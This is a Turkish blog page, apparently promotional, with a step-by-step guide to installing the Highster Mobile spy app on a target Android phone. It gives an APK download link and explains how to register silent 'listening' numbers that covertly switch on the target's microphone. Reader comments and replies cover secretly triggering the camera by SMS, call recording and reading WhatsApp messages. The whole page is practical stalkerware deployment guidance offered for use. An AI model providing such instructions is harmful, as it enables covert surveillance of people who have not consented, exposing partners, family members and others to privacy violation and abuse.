HİGHSTER MOBİLE ANDROİD KURULUMU

Highster Mobile Spy cep telefonu casus yazılımının android işletim sistemine sahip (samsung, htc, xperia gibi) cep telefonlarına nasıl yüklenip kurulduğunu aşağıda resimli olarak görebilirsiniz. Highster Mobile Spy programıda aynı Mspy programında olduğu gibi 2 dakika ila maksimum 5 dakika içerisinde takip edilmek istenen cep telefonuna kurulabilmekte ve çalışır duruma gelmektedir. Aşağıdaki resimli kurulumu takip ettiğinizde bu nun nekadar kolay olduğunu göreceksiniz.

HIGHSTER MOBILE  ANDROID KURULUMU


 1. Telefon ekranından internet sekmesine tıklanır.
2. İnternet tarayıcısı kısmına http://evt17.com/416.apk    yazılır ve Enter veya Ok denerek o sayfaya gidilir. Böylece yükleme işlemi başlatılmış olur.

3. Üst resimdeki gibi yükleme devam eder.4.Yukarıdaki resimde görüldüğü üzere yükleme işlemi biter. Üstteki resimde Open yazan tuşa basılarak aşağıdaki sayfaya  açılır.
5. Üstteki resimde dsx1115.apk dosyasına tıklanır ve aşağıdaki sayfa açılır.6. Üstteki resimdeki sayfaya gelince Install yazan tuşa tıklanır ve kurulum yapılır.7. Üstteki sayfa görünür, bu kurulumun nerdeyse bittiği anlamına gelir. Bu sayfada Open tuşuna basılır ve aşağıdaki sayfaya gidilir.8. Aşağıdaki ekran karşınıza geldiğinde License Key yazan kısıma e-mailinize gelen aktivasyon kodunuzu girmeniz gerekir.   Mobile No kısmına ise yüklemeyi yaptığınız telefonun numarasını girmeniz gerekir. Bu iki kısmı doldurduktan sonra Submit yazan tuşa tıklanır.
9. Sonra karşınıza aşağıdaki ekran çıkar bu ekran kayıt işleminizin başarılı olduğunu söyler. Bu sayfada Ok yazan yere tıklanır.10. Son olarak ok tuşuna bastıktan sonra karşınıza gelecek olan aşağıdaki ekrana isterseniz telefonu arayıpta anında ortam dinlemesi yapmanıza yarayan telefon numaralarını sıralayabilirsiniz. Bu telefon numaralarından hedef telefonu her aradığınızda hedef telefonun mikrofonu açılır ve ortam seslerini arama yaptığınız numaradan dinlemenize olanak verir. Buraya eklediğiniz numaralardan normal arama yapamazsınız çünkü bu numaralardan yapılan aramalara telefon hiç bir uyarı vermeyecektir, sadece telefonun microfon özelliği otomatikman açılacak ve ortam dinlemesi sağlanacaktır.  eğer aşağıdaki listeden numarayı kaldırırsanız ozaman o numaradan telefon normal olarakta aranabilir.

Numaraları yazarken ülke kodu ve ''0'' eklenerek yazılmalıdır.  Örneğin:  00905..........   formatında yazılmalıdır.
Daha sonra Save Number tuşuna basılır ve işlem biter.  Artık Highster Mobile online panelinize girip hedef telefondan gelen bilgilere erişebilirsiniz.

Highster Mobile Spy programını satın aldığınız andan hemen sonra satın alırken verdiğiniz e-mail adresinize kullanıcı adınız ve şifreniz gelicektir, bu bilgilerle online panelinize girebiliceksiniz.

13 yorum:

 1. kuracagımız telefonun numarasını girerken ülke kodu gerekli mi yoksa 050x1112233 seklinde mi girmeliyiz?

  YanıtlaSil
  Yanıtlar
  1. cep tamir11/18/2014

   örnek: 09053.......... şeklinde olmalı yani ülke koduyla olmalı.

   Sil
 2. Camera açma özelliğini kullanamadim. Nasıl kullanacağım konusunda yardimci olurmusunuz

  YanıtlaSil
  Yanıtlar
  1. info highster11/24/2014

   highster mobile panelinizden ayarlar kısmına girip oradaki comutlar kısmında sms komutlarına bakın, kamera açma komutunu alıp sms ile hedef telefona gonderdıgınızde camera fonksıyonu acılıp goruntuyu panelinize gonderir.

   Sil
 3. Oncelikle harika bir program ama çağrı kaydı ve ortam dinlemeyi yapamadım nasıl ayarlayabilirim

  YanıtlaSil
  Yanıtlar
  1. info highster11/26/2014

   http://gravitymobilespy1.kayako.com/ adresinden gerekli bilgiye ulaşabilirsiniz. (basiit bir ingilizceyle anlayabilirisniz)

   Sil
 4. Bu programı satın alma işleminden sonra mı süre başlıyor, yoksa programı hedef telefona yükleyip lisans kodunu girdiğimizde mi 1 aylık kullanım süremiz başlıyor.

  YanıtlaSil
  Yanıtlar
  1. tekno boy11/28/2014

   süre satın alma sonrasında hemen başlar ve süre 1 yıllıktır.

   Sil
 5. Parasına göre fazlasıyla başarılı bir program kullanıyorum çok memnunum
  Sadece whatsapp yazışmalarıni görmedim.yanlis bir ayarlamami yaptım acaba

  YanıtlaSil
 6. der san1/16/2015

  kolay ve güzel bir program

  YanıtlaSil
 7. Bu programı kendi telefonumuza mı yüklüyoruz karşı telefona mı yükleniyor yoksa ikisine de bir mi yükleniyor?

  YanıtlaSil
  Yanıtlar
  1. Tekno boy3/03/2015

   program tabiki hangi telefon takip edilmek isteniyorsa o telefona yüklenir.

   Sil
 8. Adsız6/30/2015

  Gayet basarili bir program fakat whatsapp konusmalarinin icerigini goremiyorum

  YanıtlaSil